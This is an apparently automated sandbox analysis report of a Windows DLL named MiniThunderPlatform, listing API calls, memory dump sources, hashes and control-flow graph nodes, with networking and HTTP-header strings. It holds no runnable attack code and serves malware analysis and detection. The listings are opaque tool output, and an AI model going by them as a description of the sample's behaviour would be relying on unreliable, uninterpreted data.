                                                                                                                                                • Part of subcall function 1021ADF0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1021AE66
                                                                                                                                                • Part of subcall function 1021ADF0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1021AE75
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68,?,?,?,?,?,?,?,00000000), ref: 1005150C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$ErrorExceptionLastThrow$??0exception@@??1?$basic_string@?append@?$basic_string@IoctlV01@V01@@V12@V12@@Y?$basic_string@bindhtonssetsockoptsocket
                                                                                                                                              • String ID: bind call error
                                                                                                                                              • API String ID: 783829381-1626635801
                                                                                                                                              • Opcode ID: f329200eb68745b5efa11afc37109baab918e4765a8ae76cd840ed28a1bbb476
                                                                                                                                              • Instruction ID: e849399dc762896df87e43732bc9081cb0c143596f9c4c9f9cc28d9fefb3f081
                                                                                                                                              • Opcode Fuzzy Hash: f329200eb68745b5efa11afc37109baab918e4765a8ae76cd840ed28a1bbb476
                                                                                                                                              • Instruction Fuzzy Hash: 461149754047509FC314DBA4C849B8BB7E8FF98724F404A0DF1AA83690EB78A444CF52
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 100103D7
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,00000000), ref: 100106A8
                                                                                                                                                • Part of subcall function 10009F20: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,1001055F,?,?), ref: 10009F32
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?), ref: 10010563
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@??3@V01@@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4194848485-0
                                                                                                                                              • Opcode ID: 79217381df64c277370ac80563434996095487303d21e81361d1ea32492b2681
                                                                                                                                              • Instruction ID: 0a2b073cf7bac8470bdc1930ac11f13ecabdaddced3a231cee1018ae00352d09
                                                                                                                                              • Opcode Fuzzy Hash: 79217381df64c277370ac80563434996095487303d21e81361d1ea32492b2681
                                                                                                                                              • Instruction Fuzzy Hash: 8C91C6B5B00605AFD718CF6DCD85A6FB7EAEBC8600B14852CF84ADB755EA70ED408B50
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10001213: RtlInitializeCriticalSection.NTDLL ref: 10001225
                                                                                                                                              • RtlInitializeCriticalSection.NTDLL ref: 1003597B
                                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 10035992
                                                                                                                                                • Part of subcall function 100011E7: _CxxThrowException.MSVCR71(00000000,102B1D60,?,1000127C,00000000,?,1001C1AF,00000000,00000000), ref: 100011F9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalInitializeSection$ExceptionInfoSystemThrow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3868759970-0
                                                                                                                                              • Opcode ID: e95402c12abf66ea8c385486e1fbd4045d1a17dc73945e86bfd9c0ec492f5080
                                                                                                                                              • Instruction ID: 738c412b6c49469d1648e34ed2bba3b0f258f359db90fd7d0ed2bac339cd94fc
                                                                                                                                              • Opcode Fuzzy Hash: e95402c12abf66ea8c385486e1fbd4045d1a17dc73945e86bfd9c0ec492f5080
                                                                                                                                              • Instruction Fuzzy Hash: 6361CFB4904749CFC750CF29C584A86FBE0FB59300F54899EE89A8B312DB71E844CBA5
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?), ref: 1002735E
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 10027381
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                              • Opcode ID: d8432b3171507f007597301810f8dc507fb2f417d7f4f2b56e477a3ff35fdc69
                                                                                                                                              • Instruction ID: e83bfc26b3c75542e70e5b1f6b0e2592cee8d6bd85aed1661aeb180e60f16223
                                                                                                                                              • Opcode Fuzzy Hash: d8432b3171507f007597301810f8dc507fb2f417d7f4f2b56e477a3ff35fdc69
                                                                                                                                              • Instruction Fuzzy Hash: 66F054745002008FD734DB24D84EAD973E1FB5D314FC50A18E42EC72A2EB35A544D642

                                                                                                                                              Control-flow Graph

185 100a8c84-100a8cf5 call 10029600 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 10078af0 call 100d0f27 call 10078f50 176->185 186 100a8bf4-100a8c7f call 100281c0 call 10029600 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 10078af0 call 100d0f27 call 10078f50 176->186 178->161 193 100a8939-100a893e 181->193 182->181 191 100a8923-100a8927 182->191 185->146 186->246 191->193 193->172 201 100a8944-100a8952 193->201 210 100a895e-100a896c 201->210 211 100a8954-100a8956 201->211 283 100a8f2b-100a8f4f ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 1007bd30 208->283 284 100a8f05-100a8f14 208->284 232 100a9007-100a908b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 100d1095 call 100131c0 209->232 233 100a8f87-100a9001 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 10078af0 call 100d0f27 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 209->233 215 100a896e-100a89dc call 1000f180 call 10001429 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 210->215 211->210 222 100a8958-100a895c 211->222 215->178 222->215 273 100a908d-100a90bc ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 1021b190 _CxxThrowException 232->273 274 100a90c1-100a90d0 232->274 233->232 246->146 273->274 277 100a90d9-100a91f8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 7 call 100d13ca call 10025980 274->277 278 100a90d2 274->278 278->277 283->209 285 100a8f1d-100a8f26 call 100d0dd9 284->285 286 100a8f16 284->286 285->283 286->285
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100D1419: __EH_prolog.LIBCMT ref: 100D141E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A7AC9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A7B2E
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 100A7B48
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,00000000), ref: 100A7B67
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0,?,00000000), ref: 100A7B79
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 100A7B92
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100A7BC4
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A7BD9
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(1027B998), ref: 100A7BEB
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100A7C18
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A7C2D
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(1027B994), ref: 100A7C3F
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100A7C61
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(1027B998), ref: 100A7C82
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100A7CB2
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A7CC7
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A7D34
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A7D49
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(*/*,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 100A7D5D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A7D7C
                                                                                                                                                • Part of subcall function 10078AF0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,10247E6B,000000FF), ref: 10078B27
                                                                                                                                                • Part of subcall function 10078AF0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,?,10247E6B,000000FF), ref: 10078B3A
                                                                                                                                                • Part of subcall function 10078AF0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,10247E6B,000000FF), ref: 10078B49
                                                                                                                                                • Part of subcall function 10078AF0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,10247E6B,000000FF), ref: 10078B5B
                                                                                                                                                • Part of subcall function 100D0F27: __EH_prolog.LIBCMT ref: 100D0F2C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A7DB4
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A7DC6
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(no-cache), ref: 100A7DFA
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A7E16
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(no-cache), ref: 100A7E64
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A7E80
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(close), ref: 100A7EE2
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A7EFE
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Keep-Alive), ref: 100A7F30
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A7F4C
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100A7F9C
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A7FB8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A7FF0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8002
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8015
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(10281A44), ref: 100A8047
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100A8055
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 100A80C6
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(10281A44), ref: 100A80E6
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100A80F4
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100A8125
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 100A8146
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(10281A44), ref: 100A8166
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100A817B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A818D
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100A81B8
                                                                                                                                                • Part of subcall function 100D0F27: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,00000007), ref: 100D0F67
                                                                                                                                                • Part of subcall function 100D0F27: ?rend@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$reverse_iterator@Vconst_iterator@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@XZ.MSVCP71(?,?,00000007), ref: 100D0F77
                                                                                                                                                • Part of subcall function 100D0F27: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AVconst_iterator@12@XZ.MSVCP71(?,?,00000007), ref: 100D0F86
                                                                                                                                                • Part of subcall function 100D0F27: ?rend@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$reverse_iterator@Vconst_iterator@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@XZ.MSVCP71(?,?,00000007), ref: 100D0F96
                                                                                                                                                • Part of subcall function 100D0F27: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,00000007), ref: 100D1038
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100A81F9
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A820A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A821C
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100A8236
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 100A8250
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(10281A44), ref: 100A8270
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100A8285
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A829A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100A82B3
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 100A82CE
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100A82EB
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A8307
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A8353
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8368
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100A838A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A83A6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A83DE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A83F0
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A83FD
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100A8427
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100A84A2
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A84B3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A84C5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A84DA
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100A84F4
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A8510
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A8548
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A855A
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 100A856C
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 100A8585
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Basic ), ref: 100A859E
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100A8600
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8612
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8624
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8638
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,00000000,?,?,?,00000000,?,?,?,1027B998), ref: 100A8652
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A866E
                                                                                                                                                • Part of subcall function 10078F50: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10247FD9,000000FF), ref: 10078F78
                                                                                                                                                • Part of subcall function 10078F50: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10247FD9,000000FF), ref: 10078F88
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A86B8
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 100A86CA
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Basic ), ref: 100A86E3
                                                                                                                                                • Part of subcall function 10001482: __EH_prolog.LIBCMT ref: 10001487
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,10277ABC), ref: 1000149A
                                                                                                                                                • Part of subcall function 10001482: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 100014AB
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 100014B5
                                                                                                                                                • Part of subcall function 10001482: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100014C5
                                                                                                                                                • Part of subcall function 1000EAF0: ??_V@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,102400D3,000000FF,100054B1,?,?), ref: 1000EC4C
                                                                                                                                                • Part of subcall function 1000EAF0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,102400D3,000000FF,100054B1,?,?), ref: 1000EC5D
                                                                                                                                                • Part of subcall function 1000EAF0: ??_V@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,?,102400D3,000000FF,100054B1,?,?), ref: 1000EC6D
                                                                                                                                                • Part of subcall function 1000EAF0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,102400D3,000000FF,100054B1,?,?), ref: 1000EC80
                                                                                                                                                • Part of subcall function 1000EAF0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1000EC93
